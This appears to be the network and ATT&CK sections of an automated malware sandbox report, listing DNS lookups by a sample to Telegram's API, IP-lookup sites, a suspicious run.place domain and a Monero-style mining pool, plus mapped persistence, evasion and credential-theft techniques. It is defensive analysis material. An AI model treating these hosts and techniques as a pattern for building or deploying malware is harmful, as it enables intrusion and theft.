DNS Request

131.176.67.172.in-addr.arpa
8.8.8.8:53

253.85.83.41.in-addr.arpa

dns

142 B
132 B
2
1

DNS Request

253.85.83.41.in-addr.arpa

DNS Request

253.85.83.41.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

taskmgr.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

api.myip.com

dns

7EhPCHLwVUzTFL9SfbnUelQh.exe

58 B
106 B
1
1

DNS Request

api.myip.com

DNS Response

104.26.8.59

104.26.9.59

172.67.75.163
8.8.8.8:53

ipinfo.io

dns

7EhPCHLwVUzTFL9SfbnUelQh.exe

55 B
71 B
1
1

DNS Request

ipinfo.io

DNS Response

34.117.186.192
8.8.8.8:53

26.56.192.85.in-addr.arpa

dns

142 B
222 B
2
2

DNS Request

26.56.192.85.in-addr.arpa

DNS Request

26.56.192.85.in-addr.arpa
8.8.8.8:53

59.8.26.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

59.8.26.104.in-addr.arpa
8.8.8.8:53

192.186.117.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

192.186.117.34.in-addr.arpa
8.8.8.8:53

beshomandotestbesnd.run.place

dns

taskmgr.exe

150 B
91 B
2
1

DNS Request

beshomandotestbesnd.run.place

DNS Request

beshomandotestbesnd.run.place

DNS Response

45.88.186.125
224.0.0.251:5353

632 B
8
8.8.8.8:53

pool.hashvault.pro

dns

64 B
96 B
1
1

DNS Request

pool.hashvault.pro

DNS Response

95.179.241.203

45.76.89.70
8.8.8.8:53

70.89.76.45.in-addr.arpa

dns

70 B
116 B
1
1

DNS Request

70.89.76.45.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

79.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

79.190.18.2.in-addr.arpa
8.8.8.8:53

beshomandotestbesnd.run.place

dns

taskmgr.exe

75 B
91 B
1
1

DNS Request

beshomandotestbesnd.run.place

DNS Response

45.88.186.125
8.8.8.8:53

service-domain.xyz

dns

64 B
80 B
1
1

DNS Request

service-domain.xyz

DNS Response

3.80.150.121

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion